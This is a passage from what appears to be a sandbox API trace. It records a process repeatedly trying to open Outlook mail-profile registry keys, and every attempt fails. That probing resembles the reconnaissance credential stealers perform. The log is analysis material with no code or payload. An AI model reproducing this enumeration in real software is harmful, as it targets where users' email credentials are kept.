Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.140] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.140] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.140] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.141] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.141] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.141] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.141] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.141] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.141] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.141] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.141] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.141] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.141] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.141] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.141] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.141] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.141] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.141] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.141] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.141] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.141] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.142] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.142] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.142] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.142] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.142] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.142] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.142] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.142] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.142] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.142] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.142] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.142] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.142] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.142] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.142] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.142] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.142] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.142] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.142] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.142] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.142] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.143] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.143] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.143] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.143] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.143] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.143] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.143] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.143] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.143] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.143] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.143] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.143] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.143] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", phkResult=0x1c4ef00 | out: phkResult=0x1c4ef00*=0x0) returned 0x2 [0249.143] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.143] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.143] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.143] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.143] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.143] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.143] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.143] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.143] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.143] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.144] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.144] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.144] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.144] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.144] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.144] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.144] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.144] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.144] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.144] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.144] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.144] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.144] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.144] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.144] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.144] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.144] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.144] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.144] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.144] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.144] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.144] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.144] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.145] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 